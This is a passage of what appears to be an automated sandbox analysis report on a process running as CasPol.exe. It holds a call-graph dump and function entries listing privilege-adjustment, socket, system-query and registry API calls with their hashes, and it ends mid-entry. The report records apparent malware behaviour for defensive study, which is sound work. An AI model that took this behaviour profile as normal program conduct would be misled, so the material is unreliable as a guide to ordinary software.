39270 1f9c44f2 39269->39270 39275 204548a0 4 API calls 39269->39275 39276 20454460 4 API calls 39269->39276 39277 2045444f 4 API calls 39269->39277 39278 204550d8 4 API calls 39269->39278 39279 204555cb 4 API calls 39269->39279 39270->38743 39271->39269 39272->39269 39273->39269 39274->39269 39275->39270 39276->39270 39277->39270 39278->39270 39279->39270 39281 1f9c402c 39280->39281 39282 1f9c44a7 39281->39282 39284 20452950 4 API calls 39281->39284 39285 20452c0d 4 API calls 39281->39285 39286 20452cdf 4 API calls 39281->39286 39287 204529a8 4 API calls 39281->39287 39283 1f9c44f2 39282->39283 39288 204548a0 4 API calls 39282->39288 39289 20454460 4 API calls 39282->39289 39290 2045444f 4 API calls 39282->39290 39291 204550d8 4 API calls 39282->39291 39292 204555cb 4 API calls 39282->39292 39283->38743 39284->39282 39285->39282 39286->39282 39287->39282 39288->39283 39289->39283 39290->39283 39291->39283 39292->39283 39294 1f9c3a29 39293->39294 39295 1f9c44a7 39294->39295 39297 20452950 4 API calls 39294->39297 39298 20452c0d 4 API calls 39294->39298 39299 20452cdf 4 API calls 39294->39299 39300 204529a8 4 API calls 39294->39300 39296 1f9c44f2 39295->39296 39301 204548a0 4 API calls 39295->39301 39302 20454460 4 API calls 39295->39302 39303 2045444f 4 API calls 39295->39303 39304 204550d8 4 API calls 39295->39304 39305 204555cb 4 API calls 39295->39305 39296->38743 39297->39295 39298->39295 39299->39295 39300->39295 39301->39296 39302->39296 39303->39296 39304->39296 39305->39296 39307 1f9c3aad 39306->39307 39308 1f9c44a7 39307->39308 39310 20452950 4 API calls 39307->39310 39311 20452c0d 4 API calls 39307->39311 39312 20452cdf 4 API calls 39307->39312 39313 204529a8 4 API calls 39307->39313 39309 1f9c44f2 39308->39309 39314 204548a0 4 API calls 39308->39314 39315 20454460 4 API calls 39308->39315 39316 2045444f 4 API calls 39308->39316 39317 204550d8 4 API calls 39308->39317 39318 204555cb 4 API calls 39308->39318 39309->38743 39310->39308 39311->39308 39312->39308 39313->39308 39314->39309 39315->39309 39316->39309 39317->39309 39318->39309 39320 1f9c3bf4 39319->39320 39321 1f9c44a7 39320->39321 39323 20452950 4 API calls 39320->39323 39324 20452c0d 4 API calls 39320->39324 39325 20452cdf 4 API calls 39320->39325 39326 204529a8 4 API calls 39320->39326 39322 1f9c44f2 39321->39322 39327 204548a0 4 API calls 39321->39327 39328 20454460 4 API calls 39321->39328 39329 2045444f 4 API calls 39321->39329 39330 204550d8 4 API calls 39321->39330 39331 204555cb 4 API calls 39321->39331 39322->38743 39323->39321 39324->39321 39325->39321 39326->39321 39327->39322 39328->39322 39329->39322 39330->39322 39331->39322 39333 1f9c3af8 39332->39333 39334 1f9c44a7 39333->39334 39336 20452950 4 API calls 39333->39336 39337 20452c0d 4 API calls 39333->39337 39338 20452cdf 4 API calls 39333->39338 39339 204529a8 4 API calls 39333->39339 39335 1f9c44f2 39334->39335 39340 204548a0 4 API calls 39334->39340 39341 20454460 4 API calls 39334->39341 39342 2045444f 4 API calls 39334->39342 39343 204550d8 4 API calls 39334->39343 39344 204555cb 4 API calls 39334->39344 39335->38743 39336->39334 39337->39334 39338->39334 39339->39334 39340->39335 39341->39335 39342->39335 39343->39335 39344->39335 39346 1f9c3678 39345->39346 39347 1f9c44a7 39346->39347 39349 20452950 4 API calls 39346->39349 39350 20452c0d 4 API calls 39346->39350 39351 20452cdf 4 API calls 39346->39351 39352 204529a8 4 API calls 39346->39352 39348 1f9c44f2 39347->39348 39353 204548a0 4 API calls 39347->39353 39354 20454460 4 API calls 39347->39354 39355 2045444f 4 API calls 39347->39355 39356 204550d8 4 API calls 39347->39356 39357 204555cb 4 API calls 39347->39357 39348->38743 39349->39347 39350->39347 39351->39347 39352->39347 39353->39348 39354->39348 39355->39348 39356->39348 39357->39348 39359 1f9c4083 39358->39359 39360 1f9c44a7 39359->39360 39362 20452950 4 API calls 39359->39362 39363 20452c0d 4 API calls 39359->39363 39364 20452cdf 4 API calls 39359->39364 39365 204529a8 4 API calls 39359->39365 39361 1f9c44f2 39360->39361 39366 204548a0 4 API calls 39360->39366 39367 20454460 4 API calls 39360->39367 39368 2045444f 4 API calls 39360->39368 39369 204550d8 4 API calls 39360->39369 39370 204555cb 4 API calls 39360->39370 39361->38743 39362->39360 39363->39360 39364->39360 39365->39360 39366->39361 39367->39361 39368->39361 39369->39361 39370->39361 39372 1f9c4188 39371->39372 39373 1f9c44a7 39372->39373 39374 20452950 4 API calls 39372->39374 39375 20452c0d 4 API calls 39372->39375 39376 20452cdf 4 API calls 39372->39376 39377 204529a8 4 API calls 39372->39377 39378 1f9c44f2 39373->39378 39379 204548a0 4 API calls 39373->39379 39380 20454460 4 API calls 39373->39380 39381 2045444f 4 API calls 39373->39381 39382 204550d8 4 API calls 39373->39382 39383 204555cb 4 API calls 39373->39383 39374->39373 39375->39373 39376->39373 39377->39373 39378->38743 39379->39378 39380->39378 39381->39378 39382->39378 39383->39378 39385 1f9c3906 39384->39385 39386 1f9c44a7 39385->39386 39388 20452950 4 API calls 39385->39388 39389 20452c0d 4 API calls 39385->39389 39390 20452cdf 4 API calls 39385->39390 39391 204529a8 4 API calls 39385->39391 39387 1f9c44f2 39386->39387 39392 204548a0 4 API calls 39386->39392 39393 20454460 4 API calls 39386->39393 39394 2045444f 4 API calls 39386->39394 39395 204550d8 4 API calls 39386->39395 39396 204555cb 4 API calls 39386->39396 39387->38743 39388->39386 39389->39386 39390->39386 39391->39386 39392->39387 39393->39387 39394->39387 39395->39387 39396->39387 39398 20452969 39397->39398 39400 2045298c 39397->39400 39398->38793 39399 20452cca 39400->39399 39405 204548a0 4 API calls 39400->39405 39406 20454460 4 API calls 39400->39406 39407 2045444f 4 API calls 39400->39407 39408 204550d8 4 API calls 39400->39408 39409 204555cb 4 API calls 39400->39409 39527 20453b24 39400->39527 39532 20453800 39400->39532 39537 20453b40 39400->39537 39543 20453b88 39400->39543 39405->39400 39406->39400 39407->39400 39408->39400 39409->39400 39412 204529cc 39410->39412 39411 20452cca 39412->39411 39413 204548a0 4 API calls 39412->39413 39414 20454460 4 API calls 39412->39414 39415 2045444f 4 API calls 39412->39415 39416 204550d8 4 API calls 39412->39416 39417 204555cb 4 API calls 39412->39417 39418 20453b24 4 API calls 39412->39418 39419 20453800 4 API calls 39412->39419 39420 20453b40 4 API calls 39412->39420 39421 20453b88 4 API calls 39412->39421 39413->39412 39414->39412 39415->39412 39416->39412 39417->39412 39418->39412 39419->39412 39420->39412 39421->39412 39424 20452ac0 39422->39424 39423 20452cca 39424->39423 39425 204548a0 4 API calls 39424->39425 39426 20454460 4 API calls 39424->39426 39427 2045444f 4 API calls 39424->39427 39428 204550d8 4 API calls 39424->39428 39429 204555cb 4 API calls 39424->39429 39430 20453b24 4 API calls 39424->39430 39431 20453800 4 API calls 39424->39431 39432 20453b40 4 API calls 39424->39432 39433 20453b88 4 API calls 39424->39433 39425->39424 39426->39424 39427->39424 39428->39424 39429->39424 39430->39424 39431->39424 39432->39424 39433->39424 39435 20452cca 39434->39435 39436 20452ac0 39434->39436 39436->39435 39437 204548a0 4 API calls 39436->39437 39438 20454460 4 API calls 39436->39438 39439 2045444f 4 API calls 39436->39439 39440 204550d8 4 API calls 39436->39440 39441 204555cb 4 API calls 39436->39441 39442 20453b24 4 API calls 39436->39442 39443 20453800 4 API calls 39436->39443 39444 20453b40 4 API calls 39436->39444 39445 20453b88 4 API calls 39436->39445 39437->39436 39438->39436 39439->39436 39440->39436 39441->39436 39442->39436 39443->39436 39444->39436 39445->39436 39447 204550e6 39446->39447 39448 20455109 39446->39448 39447->38794 39449 204550d8 4 API calls 39448->39449 39450 20455149 39449->39450 39451 20454460 4 API calls 39450->39451 39452 204551f1 39450->39452 39453 20455245 39451->39453 39452->38794 39454 204553b3 39453->39454 39455 10e474a RegQueryValueExW 39453->39455 39456 10e4707 RegQueryValueExW 39453->39456 39549 10e461e 39453->39549 39553 10e463e 39453->39553 39454->38794 39455->39453 39456->39453 39460 2045446e 39459->39460 39462 20454491 39459->39462 39460->38794 39461 204548b1 39461->38794 39464 2045456e 39462->39464 39468 20454883 39462->39468 39478 204548a0 4 API calls 39462->39478 39479 20454460 4 API calls 39462->39479 39480 2045444f 4 API calls 39462->39480 39463 20453b88 4 API calls 39463->39468 39464->38794 39465 20454ee7 39465->38794 39466 20454ecf 39466->39465 39467 204550d8 4 API calls 39466->39467 39469 20455149 39467->39469 39468->39461 39468->39463 39468->39466 39470 20454460 4 API calls 39469->39470 39471 204551f1 39469->39471 39472 20455245 39470->39472 39471->38794 39473 204553b3 39472->39473 39474 10e461e RegOpenKeyExW 39472->39474 39475 10e463e RegOpenKeyExW 39472->39475 39476 10e474a RegQueryValueExW 39472->39476 39477 10e4707 RegQueryValueExW 39472->39477 39473->38794 39474->39472 39475->39472 39476->39472 39477->39472 39478->39462 39479->39462 39480->39462 39482 2045446e 39481->39482 39483 20454491 39481->39483 39482->38794 39484 2045456e 39483->39484 39490 20454883 39483->39490 39496 204548a0 4 API calls 39483->39496 39497 20454460 4 API calls 39483->39497 39498 2045444f 4 API calls 39483->39498 39484->38794 39485 20453b88 4 API calls 39485->39490 39486 204548b1 39486->38794 39487 20454ee7 39487->38794 39488 20454ecf 39488->39487 39489 204550d8 4 API calls 39488->39489 39491 20455149 39489->39491 39490->39485 39490->39486 39490->39488 39492 20454460 4 API calls 39491->39492 39493 204551f1 39491->39493 39494 20455245 39492->39494 39493->38794 39495 204553b3 39494->39495 39499 10e461e RegOpenKeyExW 39494->39499 39500 10e463e RegOpenKeyExW 39494->39500 39501 10e4707 RegQueryValueExW 39494->39501 39502 10e474a RegQueryValueExW 39494->39502 39495->38794 39496->39483 39497->39483 39498->39483 39499->39494 39500->39494 39501->39494 39502->39494 39505 204555e5 39503->39505 39504 204556e5 39504->38794 39505->39504 39506 10e474a RegQueryValueExW 39505->39506 39507 10e4707 RegQueryValueExW 39505->39507 39508 10e461e RegOpenKeyExW 39505->39508 39509 10e463e RegOpenKeyExW 39505->39509 39506->39505 39507->39505 39508->39505 39509->39505 39511 204548b1 39510->39511 39517 20454895 39510->39517 39511->38794 39512 20453b88 4 API calls 39512->39517 39513 20454b2a 39513->38794 39514 20454ee7 39514->38794 39515 20454ecf 39515->39514 39516 204550d8 4 API calls 39515->39516 39518 20455149 39516->39518 39517->39510 39517->39512 39517->39513 39517->39515 39519 20454460 4 API calls 39518->39519 39520 204551f1 39518->39520 39521 20455245 39519->39521 39520->38794 39522 204553b3 39521->39522 39523 10e461e RegOpenKeyExW 39521->39523 39524 10e463e RegOpenKeyExW 39521->39524 39525 10e474a RegQueryValueExW 39521->39525 39526 10e4707 RegQueryValueExW 39521->39526 39522->38794 39523->39521 39524->39521 39525->39521 39526->39521 39528 20453b2a 39527->39528 39529 20453b4e 39528->39529 39530 20454460 4 API calls 39528->39530 39531 2045444f 4 API calls 39528->39531 39529->39400 39530->39529 39531->39529 39534 20453837 39532->39534 39533 20453b4e 39533->39400 39534->39533 39535 20454460 4 API calls 39534->39535 39536 2045444f 4 API calls 39534->39536 39535->39533 39536->39533 39538 20453b4e 39537->39538 39539 20453b71 39537->39539 39538->39400 39540 20453b96 39539->39540 39541 20454460 4 API calls 39539->39541 39542 2045444f 4 API calls 39539->39542 39540->39400 39541->39540 39542->39540 39544 20453b96 39543->39544 39545 20453bb9 39543->39545 39544->39400 39546 20453c51 39545->39546 39547 20454460 4 API calls 39545->39547 39548 2045444f 4 API calls 39545->39548 39546->39400 39547->39546 39548->39546 39550 10e463e RegOpenKeyExW 39549->39550 39552 10e46ba 39550->39552 39552->39453 39554 10e4676 RegOpenKeyExW 39553->39554 39556 10e46ba 39554->39556 39556->39453 39557 1d5faf32 39558 1d5faf82 K32GetModuleBaseNameW 39557->39558 39559 1d5faf8a 39558->39559 39560 10e1b7e 39561 10e1bce CertGetCertificateChain 39560->39561 39562 10e1bd6 39561->39562 39563 10e187e 39565 10e18b3 GetProcessTimes 39563->39565 39566 10e18e5 39565->39566 39567 10e4a7a 39568 10e4aaf bind 39567->39568 39570 10e4ae3 39568->39570 39571 1d5fad2a 39574 1d5fad5f K32EnumProcessModules 39571->39574 39573 1d5fad8e 39574->39573

                                  Executed Functions

                                  Function 20370B12 Relevance: 5.8, Strings: 3, Instructions: 2045COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr$d$d
                                  • API String ID: 0-3342231519
                                  • Opcode ID: 55d2919a72701e6c082a9ebae0f4babcb4fd5bab0128194d84ed3e74049c30ff
                                  • Instruction ID: a6224c762d0bc921b0c27cb2d24d1ad34fdba35e3bc47caafca83073eadf634a
                                  • Opcode Fuzzy Hash: 55d2919a72701e6c082a9ebae0f4babcb4fd5bab0128194d84ed3e74049c30ff
                                  • Instruction Fuzzy Hash: 4213C475D00A299FDB65CFA8C844A89F7F2BF88300F1581E6D90CAB225D775AE85CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203794D0 Relevance: 4.9, Strings: 3, Instructions: 1181COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr$:@zr$:@zr
                                  • API String ID: 0-397697517
                                  • Opcode ID: 58d888a5cd26b9b5a56d7e8eab5fd6a9b7ef6f890262c94e8b93a5215fe19c59
                                  • Instruction ID: 42cff8ddfbe6f296c78c77e782cb926d702f8352964e7c60d27c50d323d4295f
                                  • Opcode Fuzzy Hash: 58d888a5cd26b9b5a56d7e8eab5fd6a9b7ef6f890262c94e8b93a5215fe19c59
                                  • Instruction Fuzzy Hash: 4EA23770E012289FDB58DBB9C854B9EB7F2AF85304F1581A9D509EB3A1EB349D81CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FAA7F Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D5FAAFF
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: 6f02d8d6c56902d65e386e1ae40bc7374602cd89e0d939103c9ae42ad6efeb56
                                  • Instruction ID: f7b74968a4642196b1846e5a6600963a14ff702eb8c290bc95d2b247c6f7a5d2
                                  • Opcode Fuzzy Hash: 6f02d8d6c56902d65e386e1ae40bc7374602cd89e0d939103c9ae42ad6efeb56
                                  • Instruction Fuzzy Hash: 2421AE76509780AFDB128F25DC44B52BFB4EF06310F0989DAE9898F163D271E908DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4A55 Relevance: 1.6, APIs: 1, Instructions: 74networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • bind.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E4ADB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: bind
                                  • String ID:
                                  • API String ID: 1187836755-0
                                  • Opcode ID: a64658bb89e83504b4896cb7306111cc5a8a9ec8959ae900377cf35ffb9b9a41
                                  • Instruction ID: d5203360c3f9903d02db50b0c1ed9215b5dc63044ba70534bb9c8caba2467682
                                  • Opcode Fuzzy Hash: a64658bb89e83504b4896cb7306111cc5a8a9ec8959ae900377cf35ffb9b9a41
                                  • Instruction Fuzzy Hash: D4218371509384AFE722CB55DC84F96FFF8EF46220F08849AE984DF152D275A508CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E4A7A Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • bind.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E4ADB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: bind
                                  • String ID:
                                  • API String ID: 1187836755-0
                                  • Opcode ID: 7058b42fe0eca01df16e01b886dc133de3407aaa68075e93736b8d71c9d99e01
                                  • Instruction ID: b3ee00cf9cdecc115ffb0c0fb04b86f32e03adcd78aaeca2285549b6bee83171
                                  • Opcode Fuzzy Hash: 7058b42fe0eca01df16e01b886dc133de3407aaa68075e93736b8d71c9d99e01
                                  • Instruction Fuzzy Hash: 6011B271900300AFE721CF55DC88F66F7E8EF44220F1884AAED45DB241D674A405CBB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FB1D5 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtQuerySystemInformation.NTDLL ref: 1D5FB241
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: InformationQuerySystem
                                  • String ID:
                                  • API String ID: 3562636166-0
                                  • Opcode ID: bbb0a508f9d19cf336bbf0a118520849bb4eb83ac400683718ac9a1fae5434fc
                                  • Instruction ID: f58d1884c0044f8e2a3bcbef02c4312e3d8cf45fb6625a0b11778015390217e7
                                  • Opcode Fuzzy Hash: bbb0a508f9d19cf336bbf0a118520849bb4eb83ac400683718ac9a1fae5434fc
                                  • Instruction Fuzzy Hash: EB118E714097C0AFD7128F21DC84A52FFB0EF06220F0985DBED848F163D266A818CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FAAB6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule
                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D5FAAFF
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: 3716712579d6621377f466f1b6b21de5fbe2c00cbdc8bae3890455bccdb7d36f
                                  • Instruction ID: f9bb35cc160d290730aa5051d817c5e95689b3e279764c624146365f84c5c87f
                                  • Opcode Fuzzy Hash: 3716712579d6621377f466f1b6b21de5fbe2c00cbdc8bae3890455bccdb7d36f
                                  • Instruction Fuzzy Hash: 5B11A0329007409FEB21CF65D984B63FBE4EF04220F08C8AADD498F652D371E408DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FA09A Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: 5becd93f425076b41ac8d40927a9beba503e99d8986ccc826235f270077d15eb
                                  • Instruction ID: 35736827f0d53bfaa18faf3237200364261119f008e4a22d2a019071ce98c510
                                  • Opcode Fuzzy Hash: 5becd93f425076b41ac8d40927a9beba503e99d8986ccc826235f270077d15eb
                                  • Instruction Fuzzy Hash: 1601B1318047409FEB21CF55D884B52FBE4EF44720F08C89ADD488F252D376A408DBA3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1D5FB206 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtQuerySystemInformation.NTDLL ref: 1D5FB241
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: InformationQuerySystem
                                  • String ID:
                                  • API String ID: 3562636166-0
                                  • Opcode ID: 8e1b4b09f6c2e29f8b4b544ac8c77c333fb89fe57eef043816ed130c7d8d2db3
                                  • Instruction ID: bc5417fc43332e0e5fda18042231049259463853090a9e66296bea9f7a8518a8
                                  • Opcode Fuzzy Hash: 8e1b4b09f6c2e29f8b4b544ac8c77c333fb89fe57eef043816ed130c7d8d2db3
                                  • Instruction Fuzzy Hash: 90018F35904644DFE7218F15DD84B26FBE0FF48720F08C49ADD884E252D276A818CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037DE10 Relevance: .9, Instructions: 855COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe7fd9de6de1815ce436ddcae8cfa22372bb7cebd5e1d667c1dfffbca890ff53
                                  • Instruction ID: 9183aa50d2502e1b6453f208732b518c1bf49d5a3e53c884994fdff91a809e46
                                  • Opcode Fuzzy Hash: fe7fd9de6de1815ce436ddcae8cfa22372bb7cebd5e1d667c1dfffbca890ff53
                                  • Instruction Fuzzy Hash: FE726F35E006288FDB15DFA4C844B9EB7F2BF89300F1585A9E909AF261DB759E41CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20376688 Relevance: .5, Instructions: 498COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fbc025df16c9af7f137f8e3bfc8003c713670299b941b5872c24a932288cbfe2
                                  • Instruction ID: 61c3573189cfff449d2cb0b1fc58644c4beec5f33d121c3e4ab7ca71055bc647
                                  • Opcode Fuzzy Hash: fbc025df16c9af7f137f8e3bfc8003c713670299b941b5872c24a932288cbfe2
                                  • Instruction Fuzzy Hash: 2002BF70B002149FDB18EBB9C464B6E7BF2AF89354F158469D505EB391EF38DC418B92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037AC70 Relevance: .4, Instructions: 409COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 97d13797efab3cecc0f86b159ea1c6f7a6f63df9fb2673b78308e28c0ee9111a
                                  • Instruction ID: 85529f5dd0c70403759a9b6bcfc97f4bb03bb85f0f56c80b0eecf4bd1d614640
                                  • Opcode Fuzzy Hash: 97d13797efab3cecc0f86b159ea1c6f7a6f63df9fb2673b78308e28c0ee9111a
                                  • Instruction Fuzzy Hash: 57E18070F002149BEB18DBB9C8A475EB6F6AFC4350F258529E506DB395DF38AC01CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20374510 Relevance: .3, Instructions: 338COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 93a83c31ac7bad0eee5254e8f0d2624676600037568011bec8be08c3b5050f55
                                  • Instruction ID: 9cd7b4e69df1e6c4cf746818cd0d0bafb6d5a7390822a28048bc40f327ebc7e2
                                  • Opcode Fuzzy Hash: 93a83c31ac7bad0eee5254e8f0d2624676600037568011bec8be08c3b5050f55
                                  • Instruction Fuzzy Hash: 45B1D375E002458FDB14CFA8C480A6EB7F6EB86320F16C92AD555DB362DB38ED41CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20377EEA Relevance: 5.3, Strings: 4, Instructions: 313COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr$:@zr$:@zr$:@zr
                                  • API String ID: 0-3804113890
                                  • Opcode ID: 45df6d0d865611b1a1c3bc8ddfcd45c384c8e58ac13ba6794c48e7f299c22e8d
                                  • Instruction ID: a6a5e54951d989d23d35d3155c37585e07bc6a51b03fc15cb77a844147063fb0
                                  • Opcode Fuzzy Hash: 45df6d0d865611b1a1c3bc8ddfcd45c384c8e58ac13ba6794c48e7f299c22e8d
                                  • Instruction Fuzzy Hash: FCA14570F002154BEB24DBECC59076DB7F6EB89314F25C829E505D73A2DA6CDD4287A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203794C1 Relevance: 2.6, Strings: 2, Instructions: 127COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr$:@zr
                                  • API String ID: 0-3404669453
                                  • Opcode ID: f82ebcc2a3472fc35e96693fc9381c8757f24aec9f10bd9a365a0c3702457399
                                  • Instruction ID: 375e4eed799222665802d5e1f3862636f68463de66ca33fa2d38f4725148f3b0
                                  • Opcode Fuzzy Hash: f82ebcc2a3472fc35e96693fc9381c8757f24aec9f10bd9a365a0c3702457399
                                  • Instruction Fuzzy Hash: 19412B74F002589FCB18EBB9C45879E7BF2AF89254F114469E50AEB290EF388941CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20377030 Relevance: 2.0, Strings: 1, Instructions: 757COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  • Opcode ID: 804ef6f199794a440d085efaf2dd76341fb0353f995a86c7a2880f50343d827e
                                  • Instruction ID: 30719e44df41ee9664ae01ce4c7da4ae42f4c60bdae2e6e3950b3e38007a9f10
                                  • Opcode Fuzzy Hash: 804ef6f199794a440d085efaf2dd76341fb0353f995a86c7a2880f50343d827e
                                  • Instruction Fuzzy Hash: 1D528B70A043558FDB05DBB8C894B9DBBF2AF85314F158469D409EB3A6DB38EC42CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 010E239C Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetTempFileNameW.KERNEL32(?,00000EA4,?,?), ref: 010E2476
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileNameTemp
                                  • String ID:
                                  • API String ID: 745986568-0
                                  • Opcode ID: 58b851b2a4913e314a15f4e3e685b5f2bc47e14e76604575f438dd8255d71d68
                                  • Instruction ID: cd804baf90990c98df7537b7cda75107cccc3c7f6d0ce674a13200aa6ea2925d
                                  • Opcode Fuzzy Hash: 58b851b2a4913e314a15f4e3e685b5f2bc47e14e76604575f438dd8255d71d68
